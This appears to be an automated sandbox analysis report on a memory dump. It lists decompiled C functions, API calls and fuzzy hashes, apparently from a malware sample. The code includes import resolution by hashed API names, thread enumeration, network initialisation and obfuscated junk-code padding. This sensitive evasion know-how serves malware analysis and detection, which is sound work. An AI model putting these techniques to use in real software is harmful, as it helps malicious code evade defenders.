0x000914e5
0x000914e8
0x000914e8
0x00000000

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dd36913ba3a0da290a7f2302420678506e15001b281f6a453d5469f6c2b69b8
Instruction ID: 03da179e66cfeac96f9f0c36ae48a9726aeeea956ce1e1fcd64655db540d2e03
Opcode Fuzzy Hash: 7dd36913ba3a0da290a7f2302420678506e15001b281f6a453d5469f6c2b69b8
Instruction Fuzzy Hash: 67113D72A4021A7BDF112E61AC02BFE3A699F55765F050120FC29A51D3F532CE20B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 000AB710, Relevance: 1.6, APIs: 1, Instructions: 50
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E000AB710(void* __eflags, struct _SECURITY_ATTRIBUTES* _a4, WCHAR* _a8, intOrPtr _a12) {
				void* _t5;
				intOrPtr* _t8;
				void* _t10;
				intOrPtr* _t11;
				void* _t15;
				void* _t17;

				E0009BF50(__eflags, 0, 0xee41457);
				_t5 = CreateMutexW(_a4, 0, _a8); // executed
				_t17 = 0;
				_t25 = _t5;
				if(_t5 != 0) {
					_t15 = _t5;
					_t8 = E0009BF50(_t25, 0, E00099D50(0x640dea48));
					_t10 = E00093750(_t25,  *_t8(_t15, _a12), 0xffffff7f);
					_t26 = _t10;
					if(_t10 == 0) {
						_t17 = _t15;
					} else {
						_t11 = E0009BF50(_t26, 0, 0xb8e7db5);
						 *_t11(_t15);
					}
				}
				return _t17;
			}

0x000ab723
0x000ab72f
0x000ab731
0x000ab733
0x000ab735
0x000ab73a
0x000ab74c
0x000ab75e
0x000ab766
0x000ab768
0x000ab77e
0x000ab76a
0x000ab771
0x000ab77a
0x000ab77a
0x000ab768
0x000ab786

APIs

CreateMutexW.KERNEL32(?,00000000,000B2850,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000AB72F

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CreateLibraryLoadMutex
String ID:
API String ID: 427046056-0
Opcode ID: f10190324e9808c8fffb4881bf8e11c177d626dab9099dcf72260aa773db75b6
Instruction ID: e1a553a33ae1fcedd2996e0e2f1cc664e70b3df4c43124e9b37a272d12d64a21
Opcode Fuzzy Hash: f10190324e9808c8fffb4881bf8e11c177d626dab9099dcf72260aa773db75b6
Instruction Fuzzy Hash: E7F062ABA4521837EA1025F57C53FBF724C8BD2B66F050020FE1CA7287EA91AD0056F2

Uniqueness

Uniqueness Score: -1.00%

Function 00098290, Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00098290(intOrPtr _a4) {
				void* _t4;
				long _t6;
				void* _t8;
				intOrPtr _t9;

				_t9 = _a4;
				_t19 = _t9;
				if(_t9 == 0) {
					__eflags = 0;
					return 0;
				}
				_t4 = E00091460(_t19, _t9, E00099D50(0x1bde8cd4));
				_t6 = E000922E0(_t19, _t4 + 4, E00099D50(0x1bde8cd4));
				E0009BF50(_t19, 0, 0x8685de3);
				_t8 = RtlAllocateHeap( *0xb2124, 8, _t6); // executed
				return _t8;
			}

0x00098294
0x00098297
0x00098299
0x000982ec
0x00000000
0x000982ec
0x000982aa
0x000982c6
0x000982d7
0x000982e8
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,?,?,?,?,?,?,?,?), ref: 000982E8

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7e459e1d3ec2232cc4591ea6ce7c0c7c6018a9fad2a67d1224fd1219211554c8
Instruction ID: b47334337243ddb6a87379554c9306c69a174ebb3430ee892321c1dcaa6944d1
Opcode Fuzzy Hash: 7e459e1d3ec2232cc4591ea6ce7c0c7c6018a9fad2a67d1224fd1219211554c8
Instruction Fuzzy Hash: D1E03067D525257BE95132A47C03AEB35484B137BAF0A0130FD0DB6243E9426A1423FB

Uniqueness

Uniqueness Score: -1.00%

Function 000AC210, Relevance: 1.5, APIs: 1, Instructions: 26
networkCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E000AC210(void* __eflags) {
				char _v408;
				intOrPtr* _t2;
				signed short _t3;
				void* _t5;

				_t2 = E0009BF50(__eflags, 6, 0xaaf7240); // executed
				_t3 = E00099BA0(_t2, 0x2ae);
				_t5 =  *_t2(_t3 & 0x0000ffff,  &_v408); // executed
				return E000955C0(_t5, 0) & 0x00000001;
			}

0x000ac221
0x000ac230
0x000ac243
0x000ac25a

APIs

WSAStartup.WS2_32(?,?), ref: 000AC243

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 4829a1b5f7d1d0976f454f189348e935f6b83b4233ebfaf1aafd2ea4ee9fa5a6
Instruction ID: d5895b9e638ac6411623dac02507ec4e805386f91435ba691547b838b3c06b0e
Opcode Fuzzy Hash: 4829a1b5f7d1d0976f454f189348e935f6b83b4233ebfaf1aafd2ea4ee9fa5a6
Instruction Fuzzy Hash: 2AE086B2D4031437E92071B57C27FF636484711725F450060FE4C551C3F456662891F6

Uniqueness

Uniqueness Score: -1.00%

Function 000A0390, Relevance: 1.5, APIs: 1, Instructions: 26
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000A0390(void* __eax) {
				void _v12;
				void* _t4;
				int _t7;
				void* _t15;

				_v12 = 0xa;
				_t4 = E00099D50(0x647400bf);
				E0009BF50(_t15, _t4, E00099D50(0x61c0d6ad));
				_t7 = InternetSetOptionA(0, 0x49,  &_v12, 4); // executed
				return _t7;
			}

0x000a0395
0x000a03a1
0x000a03ba
0x000a03cc
0x000a03d3

APIs

InternetSetOptionA.WININET(00000000,00000049,?,00000004,?,?,?,0009C94D), ref: 000A03CC

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: InternetOption
String ID:
API String ID: 3327645240-0
Opcode ID: 98baf4a81c68f3c2e09b4eb87160d60d14197c57aff57431e3847a6a996ccf3d
Instruction ID: 1a323cbb603b15f59ad3f8e310fef35c1e3c6bf861833f074b03d76a9f13790f
Opcode Fuzzy Hash: 98baf4a81c68f3c2e09b4eb87160d60d14197c57aff57431e3847a6a996ccf3d
Instruction Fuzzy Hash: 41E08CE6D812143AEA1062D4BC53FFB355C8B12729F050074FA0DA5283F5A666148AE3

Uniqueness

Uniqueness Score: -1.00%

Function 000A8F40, Relevance: 1.3, APIs: 1, Instructions: 47
sleepCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E000A8F40(intOrPtr _a4, intOrPtr _a8, signed char _a12, signed char _a16, char _a20) {
				char _t8;
				signed int _t11;
				signed int _t13;
				char _t14;
				void* _t15;

				if(_a8 == 0) {
					L7:
					return _t8;
				}
				_t13 = _a16 & 0x000000ff;
				_t11 = _a12 & 0x000000ff;
				_t14 = 0;
				_t18 = 0;
				if(0 != 0) {
					L5:
					_t18 = _a20;
					if(_a20 != 0) {
						E0009BF50(_t18, 0, 0x7a2bc0);
						_t15 = _t15 + 8;
						Sleep(0x14); // executed
					}
					while(1) {
						L3:
						 *((char*)(_a4 + _t14)) = E0009D620(_t11, _t13);
						_t8 = E00091460(_t18, _t14, 1);
						_t15 = _t15 + 0x10;
						_t14 = _t8;
						if(_t8 == _a8) {
							goto L7;
						}
						if(_t14 == 0) {
							continue;
						}
						goto L5;
					}
					goto L7;
				}
				goto L3;
			}

0x000a8f4a
0x000a8fa5
0x000a8fa5
0x000a8fa5
0x000a8f4c
0x000a8f50
0x000a8f54
0x000a8f56
0x000a8f58
0x000a8f86
0x000a8f86
0x000a8f8a
0x000a8f93
0x000a8f98
0x000a8f9d
0x000a8f9d
0x000a8f60
0x000a8f60
0x000a8f6d
0x000a8f73
0x000a8f78
0x000a8f7e
0x000a8f80
0x00000000
0x00000000
0x000a8f84
0x00000000
0x00000000
0x00000000
0x000a8f84
0x00000000
0x000a8f60
0x00000000

APIs

Sleep.KERNEL32(00000014), ref: 000A8F9D

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 22e74aa7ae2e6ede0cf4a02df25a19209aa829a3732771a0c32933063bc33dcc
Instruction ID: 17ab3fad13c1647c9a5e7415fb4f31298057cfe3b74b0d69370ef050f416eea8
Opcode Fuzzy Hash: 22e74aa7ae2e6ede0cf4a02df25a19209aa829a3732771a0c32933063bc33dcc
Instruction Fuzzy Hash: F8F02B72D453AE3ECF311AA0AC45FEE7B854B87BA9F194131FC4929283D961895083F1

Uniqueness

Uniqueness Score: -1.00%

Function 0009B570, Relevance: 1.3, APIs: 1, Instructions: 17
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0009B570(void* _a4) {
				void* _t2;
				int _t4;
				void* _t5;

				_t5 = _a4;
				_t8 = _t5;
				if(_t5 != 0) {
					E0009BF50(_t8, 0, 0xb86de55);
					_t4 = HeapFree( *0xb2124, 0, _t5); // executed
					return _t4;
				}
				return _t2;
			}

0x0009b574
0x0009b577
0x0009b579
0x0009b582
0x0009b593
0x00000000
0x0009b593
0x0009b597

APIs

HeapFree.KERNEL32(00000000,000A54D2,000A54D2,?), ref: 0009B593

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0e6dac1c9f28517e7a7f85ec535248eb572c6a1681859f4483bf8789543ff126
Instruction ID: 12d17eef5bec0ac8183a723a808ff7b064c40324a5c7f0ce1e0f05c7f8cd6a9d
Opcode Fuzzy Hash: 0e6dac1c9f28517e7a7f85ec535248eb572c6a1681859f4483bf8789543ff126
Instruction Fuzzy Hash: 9CD01273A8532877DA212A95BD07FDA7B5C8B15FB1F090021FE0C7B251A692791056E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0009D830, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 280
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0009D830(signed int _a4, intOrPtr _a8) {
				signed short* _v20;
				CHAR* _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v140;
				void* _t78;
				void* _t79;
				void* _t83;
				void* _t93;
				signed short* _t100;
				signed short* _t102;
				void* _t105;
				void* _t112;
				char _t113;
				signed short* _t114;
				void* _t115;
				void* _t120;
				signed int _t122;
				signed int _t124;
				signed int _t133;
				void* _t135;
				intOrPtr _t136;
				signed int _t137;
				signed int _t139;
				_Unknown_base(*)()* _t141;
				char* _t143;
				signed int _t144;
				void* _t149;
				signed short* _t153;
				signed int _t155;
				intOrPtr _t159;
				void* _t160;
				signed char* _t161;
				void* _t165;
				intOrPtr _t166;
				_Unknown_base(*)()* _t170;
				signed short* _t173;
				CHAR* _t174;
				signed int _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t180;
				void* _t183;
				void* _t187;
				void* _t191;
				void* _t192;
				void* _t199;

				_t133 = _a4;
				_t141 = 0;
				_t204 = _t133;
				if(_t133 != 0) {
					_t78 = E000A12D0(_t204, _t133);
					_t149 = _t78;
					_t165 =  *((intOrPtr*)(_t78 + 0x60)) + _t133;
					_t79 = E00099D50(0x975b6640);
					_t141 = 0;
					_t180 = _t178 + 8;
					_t205 =  *((intOrPtr*)(_t79 + _t165 + 0xcd0992c));
					if( *((intOrPtr*)(_t79 + _t165 + 0xcd0992c)) != 0) {
						_t6 = _t165 + 0xcd09914; // 0xcd09914
						_t166 = _t79 + _t6;
						_v36 =  *((intOrPtr*)(_t149 + 0x64));
						_t153 =  *((intOrPtr*)(_t166 + 0x24)) + _t133 - E00099D50(0x60421690) + 0x436163c;
						_v32 = _t166;
						_t83 = E00091460(_t205, E00091460(_t205,  *((intOrPtr*)(_t166 + 0x20)), 0x5eaee274), _t133);
						_t183 = _t180 + 0x14;
						_v40 =  ~_t133;
						_t143 = _t83 + 0xa1511d8c;
						_t135 = 0;
						0;
						do {
							_v20 = _t153;
							_v24 = _t143;
							_t155 =  ~(E00091460(0,  ~( *_t143), _v40));
							E00091460(0,  *_t143, _a4);
							E000A8F20( &_v140, E00099D50(0x647400c8));
							_t187 = _t183 + 0x1c;
							_t91 =  *_t155;
							if( *_t155 != 0) {
								_t176 = 0;
								do {
									 *((char*)(_t177 + _t176 - 0x88)) = E000AD680(0, _t91);
									_t176 = _t176 - E000922E0(0, 0, 1);
									E00091460(0, _t176, 1);
									_t187 = _t187 + 0x14;
									_t91 =  *(_t155 + _t176) & 0x000000ff;
								} while (( *(_t155 + _t176) & 0x000000ff) != 0);
							}
							_push(0xffffffff);
							_t93 = E000A00A0( &_v140);
							_t183 = _t187 + 8;
							if(_t93 == _a8) {
								_t136 = _v32;
								_t170 = E00091460(__eflags, 0x637bf4a0 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x1c)) + _a4 - E00099D50(0xffb90b0) + 0x6b8f901c + ( *_v20 & 0x0000ffff) * 4)), _a4) + 0x9c840b60;
								_t100 = E000922E0(__eflags, _t136, 0x52cc09fc);
								_t159 = _v36;
								_v20 = _t100;
								E00091460(__eflags, _t136, _t159);
								_t141 = _t170;
								_t191 = _t183 + 0x1c;
								__eflags = _t170 - _t136;
								if(_t170 > _t136) {
									_t102 = _v20;
									__eflags = _t141 - _t159 + _t102 + 0x52cc09fc;
									if(_t141 < _t159 + _t102 + 0x52cc09fc) {
										_v24 =  *_t141;
										_v20 = _t141;
										_t105 = E00097DD0(0x82);
										_t192 = _t191 + 4;
										_t144 = _v24;
										_t137 = 0;
										__eflags = _t144 - _t105;
										if(_t144 != _t105) {
											_t122 = _t144;
											_t175 = 0;
											__eflags = 0;
											0;
											do {
												 *(_t177 + _t175 - 0x88) = _t122;
												_t124 = E00091460(__eflags, E000922E0(__eflags, 0, _t175), 0xffffffff);
												_t137 =  ~_t124;
												E00091460(__eflags, _t175, 1);
												_t192 = _t192 + 0x18;
												_t175 = _t137;
												_t122 =  *(_v20 - _t124) & 0x000000ff;
												__eflags = _t122 - 0x2e;
											} while (__eflags != 0);
										}
										_t160 = E00091460(__eflags, _t137, E00099D50(0x3638cbc4));
										E00091460(__eflags, _t137, 1);
										_v24 = _v20 + _t160 - 0x524ccb67;
										 *((char*)(_t177 + _t137 - 0x88)) = E00097DD0(0x82);
										 *((char*)(_t177 + _t160 - 0x524ccbef)) = 0x64;
										_t112 = E00099D50(0x8707952b);
										 *((char*)(_t177 + _t137 - 0x86)) = 0x6c;
										_t113 = E00097DD0(0xc0);
										_v28 = 0;
										 *((char*)(_t137 - _t112 +  &_v140 - 0x1c8c6a76)) = _t113;
										_t114 = _v20;
										 *((char*)(_t177 + _t137 - 0x84)) = 0;
										_t173 = _t114;
										_t115 = E00097DD0(0x8f);
										_t199 = _t192 + 0x24;
										__eflags =  *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) - _t115;
										if( *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) != _t115) {
											_t174 = _v24;
										} else {
											_t139 = _v24[1];
											__eflags = _t139;
											if(_t139 == 0) {
												_t174 =  &_v28;
											} else {
												_t161 = _t160 + _t173 - 0x524ccb65;
												do {
													_t120 = E000955A0(_v28, 0xa);
													_t199 = _t199 + 8;
													_v28 = _t139 + _t120 - 0x30;
													_t139 =  *_t161 & 0x000000ff;
													_t161 =  &(_t161[1]);
													__eflags = _t139;
												} while (_t139 != 0);
												_t174 =  &_v28;
											}
										}
										_t141 = GetProcAddress(LoadLibraryA( &_v140), _t174);
									}
								}
							} else {
								goto L7;
							}
							goto L22;
							L7:
							_t135 = _t135 + 1;
							_t143 =  &(_v24[4]);
							_t153 =  &(_v20[1]);
						} while (_t135 <  *((intOrPtr*)(_v32 + 0x18)));
						_t141 = 0;
					}
				}
				L22:
				return _t141;
			}

0x0009d839
0x0009d83c
0x0009d83e
0x0009d840
0x0009d847
0x0009d852
0x0009d854
0x0009d85b
0x0009d860
0x0009d862
0x0009d865
0x0009d86d
0x0009d873
0x0009d873
0x0009d880
0x0009d894
0x0009d89f
0x0009d8af
0x0009d8b4
0x0009d8bb
0x0009d8be
0x0009d8c4
0x0009d8cc
0x0009d8d0
0x0009d8d2
0x0009d8d5
0x0009d8ea
0x0009d8f0
0x0009d90d
0x0009d912
0x0009d915
0x0009d919
0x0009d91b
0x0009d920
0x0009d92c
0x0009d942
0x0009d944
0x0009d949
0x0009d94c
0x0009d950
0x0009d920
0x0009d954
0x0009d95d
0x0009d962
0x0009d968
0x0009d98d
0x0009d9c4
0x0009d9d0
0x0009d9d8
0x0009d9db
0x0009d9e0
0x0009d9e5
0x0009d9e7
0x0009d9ea
0x0009d9ec
0x0009d9f2
0x0009d9fc
0x0009d9fe
0x0009da06
0x0009da0e
0x0009da11
0x0009da16
0x0009da19
0x0009da1c
0x0009da1e
0x0009da20
0x0009da22
0x0009da24
0x0009da24
0x0009da2c
0x0009da30
0x0009da30
0x0009da45
0x0009da51
0x0009da56
0x0009da5b
0x0009da61
0x0009da65
0x0009da68
0x0009da68
0x0009da30
0x0009da83
0x0009da88
0x0009da9a
0x0009daaa
0x0009dab1
0x0009dabe
0x0009dac8
0x0009dad7
0x0009dae5
0x0009daec
0x0009daf3
0x0009daf6
0x0009db05
0x0009db0c
0x0009db11
0x0009db14
0x0009db16
0x0009db54
0x0009db18
0x0009db1e
0x0009db21
0x0009db23
0x0009db59
0x0009db25
0x0009db25
0x0009db30
0x0009db35
0x0009db3a
0x0009db44
0x0009db47
0x0009db4a
0x0009db4b
0x0009db4b
0x0009db4f
0x0009db4f
0x0009db23
0x0009db70
0x0009db70
0x0009d9fe
0x00000000
0x00000000
0x00000000
0x00000000
0x0009d96a
0x0009d973
0x0009d974
0x0009d977
0x0009d97a
0x0009d983
0x0009d983
0x0009d86d
0x0009db72
0x0009db7b

APIs

LoadLibraryA.KERNEL32(?), ref: 0009DB62
GetProcAddress.KERNEL32(00000000,?), ref: 0009DB6A

Strings

l, xrefs: 0009DAC8
d, xrefs: 0009DAB1

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: AddressLibraryLoadProc
String ID: d$l
API String ID: 2574300362-91452987
Opcode ID: e2a66a7f29839d7ee876785f66da9d4f7e3b194f6b603531649ba7ce79ef0c6e
Instruction ID: 6eca26b2e0120264f5b23545452b970cb6935aa484fee8db310441e1e39abbb3
Opcode Fuzzy Hash: e2a66a7f29839d7ee876785f66da9d4f7e3b194f6b603531649ba7ce79ef0c6e
Instruction Fuzzy Hash: CB9119B6D402159BDF109FB4AC82AFE7BB4AF16358F090065FC49B7343E6319A14D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 000A69A0, Relevance: 7.6, APIs: 5, Instructions: 65
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000A69A0(void* __eflags) {
				intOrPtr _v32;
				signed int _v36;
				void* _v44;
				signed char _t13;
				signed int _t16;
				signed int _t19;
				long _t23;
				void* _t24;
				void* _t25;
				void* _t27;

				_t24 = CreateToolhelp32Snapshot(4, 0);
				_v44 = E00099D50(0x647400b0);
				_t23 = GetCurrentProcessId();
				_t13 = E000955C0(Thread32First(_t24,  &_v44), 0);
				_t27 = _t25 + 0xc;
				if((_t13 & 0x00000001) != 0) {
					L6:
					_t19 = 0;
				} else {
					0;
					0;
					while(GetLastError() != 0x12) {
						_t16 = E000955C0(_v32, _t23);
						_t27 = _t27 + 8;
						_t19 =  ~(_t16 & 0x00000001) & _v36;
						if(Thread32Next(_t24,  &_v44) != 0) {
							if(_t19 == 0) {
								continue;
							} else {
							}
						}
						goto L7;
					}
					goto L6;
				}
				L7:
				return _t19;
			}

0x000a69b2
0x000a69c1
0x000a69ca
0x000a69d9
0x000a69de
0x000a69e3
0x000a6a25
0x000a6a25
0x000a69eb
0x000a69eb
0x000a69ef
0x000a69f0
0x000a69ff
0x000a6a04
0x000a6a11
0x000a6a1d
0x000a6a21
0x00000000
0x00000000
0x000a6a23
0x000a6a21
0x00000000
0x000a6a1d
0x00000000
0x000a69f0
0x000a6a27
0x000a6a30

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000A69AD
GetCurrentProcessId.KERNEL32 ref: 000A69C4
Thread32First.KERNEL32(00000000,?), ref: 000A69D1
GetLastError.KERNEL32 ref: 000A69F0
Thread32Next.KERNEL32(00000000,?), ref: 000A6A16

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Thread32$CreateCurrentErrorFirstLastNextProcessSnapshotToolhelp32
String ID:
API String ID: 1709709923-0
Opcode ID: a5d2626746ee28409eea80e0be773af7b85a77519e888a0b7592b8809c3b9075
Instruction ID: 22550d9d978fb53d7757af38329ec937254bd234e22e72e960605e5c38966302
Opcode Fuzzy Hash: a5d2626746ee28409eea80e0be773af7b85a77519e888a0b7592b8809c3b9075
Instruction Fuzzy Hash: 5801F2B29503046BEB117BF4AC96FFF3A7CEF53315F480130FA04A2123E91A990486B2

Uniqueness

Uniqueness Score: -1.00%

Function 00092340, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00092340(char _a4) {
				signed int _v20;
				struct HDC__* _v24;
				signed int _v28;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				struct HWND__* _t32;
				int _t34;
				struct HWND__* _t35;
				signed int _t36;
				signed int _t39;
				int _t42;
				signed int _t48;
				signed int _t49;
				signed int _t54;
				void* _t56;
				signed int _t58;
				int _t59;

				_t1 =  &_a4; // 0x92f73
				_t56 =  *_t1;
				_t34 = _t56 & 0x00000100;
				RegEnumValueW(_t56, _t34, _t34, _t56 & 0xfffffeff, _t34, _t56 & 0xfffffeff, _t56, _t34);
				_t35 = _t34 * _t56;
				_t39 = 0;
				if(_t35 != _t56) {
					_t36 = _t35 | _t56;
					_t32 = _t36 * _t56;
					_t39 = _t36 * _t32 | _t32;
					_t35 = _t32;
				}
				_t54 = _t39 ^ _t56;
				DestroyWindow(_t35);
				_t58 = _t39 * _t54;
				_v20 = _t58;
				_t3 =  &_a4; // 0x92f73
				_t59 =  *_t3;
				_t42 = _t58 - _t59;
				if(_t59 == 0xaec9ea02 && _t35 != 0xaec9ea02) {
					_t48 = _t42 * _t35;
					_t5 = _t54 - 0x513615fe; // -1362499070
					_t49 = _t48 + _t5;
					_t42 = _t48 + 0xaec9ea02;
					_v24 = _t49;
					_t28 = _t54 * _t49;
					_v28 = _t28;
					_t29 = _t28 + 0xc9;
					_t30 = _t29 * _t35;
					_t35 = _t29 * _t35 >> 0x20;
					_v20 = _t30;
				}
				if(_t35 >= _t59 && _t42 != _t59) {
					MoveToEx(_v24, _t59, _t42, _t59);
					return ((_v28 ^ (_t35 + _v20 & 0x000000ff) * 0xffffffe3) << 0x18) + 0x2a000000 >> 0x18;
				}
				return 0;
			}

0x00092349
0x00092349
0x0009234e
0x00092363
0x00092369
0x0009236c
0x00092370
0x00092372
0x00092376
0x0009237e
0x00092381
0x00092381
0x00092385
0x0009238a
0x00092390
0x00092393
0x00092398
0x00092398
0x0009239e
0x000923a6
0x000923b2
0x000923b5
0x000923b5
0x000923bc
0x000923c2
0x000923c5
0x000923c8
0x000923d0
0x000923d2
0x000923d4
0x000923d6
0x000923d6
0x000923e2
0x000923ee
0x00000000
0x00092410
0x00092419

APIs

RegEnumValueW.ADVAPI32(s/,s/,s/,s/,s/,s/,s/,s/,?,00092F73,?,?,?,?,?,0009AE51), ref: 00092363
DestroyWindow.USER32 ref: 0009238A
MoveToEx.GDI32(00000000,s/,00000000,s/), ref: 000923EE

Strings

s/, xrefs: 00092349, 00092398, 0009235B, 0009235C, 0009235D, 0009235E, 0009235F, 00092360, 00092361, 00092362, 00092387, 000923E8, 000923EA

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: DestroyEnumMoveValueWindow
String ID: s/
API String ID: 1329181790-3258355666
Opcode ID: ea71abc9060870624eee78be531de38e292de3fa50a3bda0095037a54bc3101b
Instruction ID: 70ad689ee023e80a6db14eadaef927469d72580a84d77f7cc3ebeba9af05c8b5
Opcode Fuzzy Hash: ea71abc9060870624eee78be531de38e292de3fa50a3bda0095037a54bc3101b
Instruction Fuzzy Hash: CF2129717002396FDB1C8AA98CD65FFBEDDEB88660B05413BF406DB291E5A48D4183E0

Uniqueness

Uniqueness Score: -1.00%

Function 000946E0, Relevance: 6.1, APIs: 4, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000946E0(void* __eax, struct _LUID* _a4, struct HDC__* _a8, long _a12) {
				signed int _v20;
				signed int _t33;
				int _t34;
				signed int _t45;
				struct tagRECT* _t46;
				signed char _t47;
				signed int _t48;
				WCHAR* _t49;
				struct HWND__* _t50;
				signed char _t51;
				signed char _t55;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t62;
				struct _LUID* _t63;
				signed int _t64;
				signed int _t71;
				int _t73;
				signed int _t75;
				signed int _t81;
				signed int _t82;
				struct HDC__* _t83;
				signed int _t84;

				_t73 = _a12;
				_t83 = _a8;
				_t45 = _t83 * 0x59;
				_t46 = _t45 ^ 0x000000fa;
				_t47 = _t46 & (_t45 ^ 0x00000023);
				OffsetRect(_t46, _t73, _t73);
				_t55 = _t47 + 0xbd;
				_t57 = (_t55 ^ _t47) + _t47;
				_t48 = _t55;
				_v20 = _t57;
				_t58 = _t57;
				_t75 = (_t58 + _t83) * _t48;
				if(_t83 != _t73 || _t58 >= _a8) {
					_t84 = _t75;
					_t49 = _t48 + _t84;
					_t83 = _t84 + _t49;
					LookupPrivilegeValueW(_t49, _t83, _a4);
					_t59 = _t83 + _t49;
					_t75 = _t59 | _t49;
					_t33 = _t49;
					_t48 = _t83;
					if(_a4 == 0xd9f29025) {
						goto L3;
					}
				} else {
					_t59 = _v20;
					if(_a4 != 0xd9f29025) {
						L7:
						_v20 = _t59;
						if(_t59 != _a12) {
							L11:
							_t34 = _a4;
							_t50 = _t48 + _t34;
							EndDialog(_t50, _t34);
							_t81 = ((_t75 ^ _t50) << 0x10) + 0x3080000 >> 0x10;
							_t62 = _t81 * _t50;
							_t83 = (_t83 * _t62 << 0x10) + 0x2520000 >> 0x10;
							_t33 = _t50;
							_t48 = _t81;
							L12:
							if(_a8 == _a12) {
								_t82 = _t62;
								_t63 = _a4;
								if(_t63 != _a8 && _t33 != _t63) {
									SetTextColor(_t83, _a12);
									_t48 = _t82 & (_t83 - _a8 ^ _t48 ^ 0x000003be | 0x00001000);
								}
							}
							return _t48;
						}
						_t64 = _t75;
						if(_t64 != _a12 || _t64 == _a4) {
							goto L11;
						} else {
							_t62 = _v20;
							goto L12;
						}
					}
					L3:
					if(_a8 != 0xd9f29025) {
						_t71 = _t59;
						if(_t71 == _a8) {
							_t59 = _t71;
						} else {
							_t33 = (_t75 << 0x10) + 0x1c0000 >> 0x10;
							_t51 = _t48 + _t33;
							_t83 = (_t51 << 0x18) + 0x6b000000 >> 0x18;
							_t59 = _t51 * _t83;
							_t48 = _t59 * 0x6c000000 >> 0x18;
						}
					}
				}
			}

0x000946e7
0x000946ea
0x000946ed
0x000946f4
0x000946fa
0x000946ff
0x00094709
0x00094711
0x00094713
0x00094715
0x00094718
0x00094720
0x00094725
0x00094781
0x00094784
0x00094786
0x00094791
0x0009479a
0x0009479f
0x000947a1
0x000947a3
0x000947ab
0x00000000
0x00000000
0x0009472c
0x00094731
0x0009473a
0x000947ad
0x000947ad
0x000947b6
0x000947ca
0x000947ca
0x000947cd
0x000947d1
0x000947e2
0x000947e7
0x000947f9
0x000947fc
0x000947fe
0x00094800
0x00094806
0x00094808
0x0009480a
0x00094810
0x0009481d
0x00094838
0x00094838
0x00094810
0x00094844
0x00094844
0x000947b8
0x000947be
0x00000000
0x000947c5
0x000947c5
0x00000000
0x000947c5
0x000947be
0x0009473c
0x00094743
0x00094745
0x0009474d
0x00094845
0x00094753
0x0009475d
0x00094760
0x0009476d
0x00094773
0x0009477c
0x0009477c
0x0009474d
0x00094743

APIs

OffsetRect.USER32 ref: 000946FF
LookupPrivilegeValueW.ADVAPI32(00000000,-000B1D33,?), ref: 00094791
EndDialog.USER32 ref: 000947D1
SetTextColor.GDI32(-025D1D33,-03E11D33), ref: 0009481D

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: ColorDialogLookupOffsetPrivilegeRectTextValue
String ID:
API String ID: 2289036324-0
Opcode ID: c28254e91cc9728cd500f66602ef27c31b092bbb0b24000b771ab6631e913eb3
Instruction ID: 9ba050ebae513c17508a059913b242c535c4c40c2c5e30d2476a67e724f3c317
Opcode Fuzzy Hash: c28254e91cc9728cd500f66602ef27c31b092bbb0b24000b771ab6631e913eb3
Instruction Fuzzy Hash: EB411833B005285BDF18CE58CCE0ABFB7EAEB95351B568629F8199B741C634AD46C6C0

Uniqueness

Uniqueness Score: -1.00%

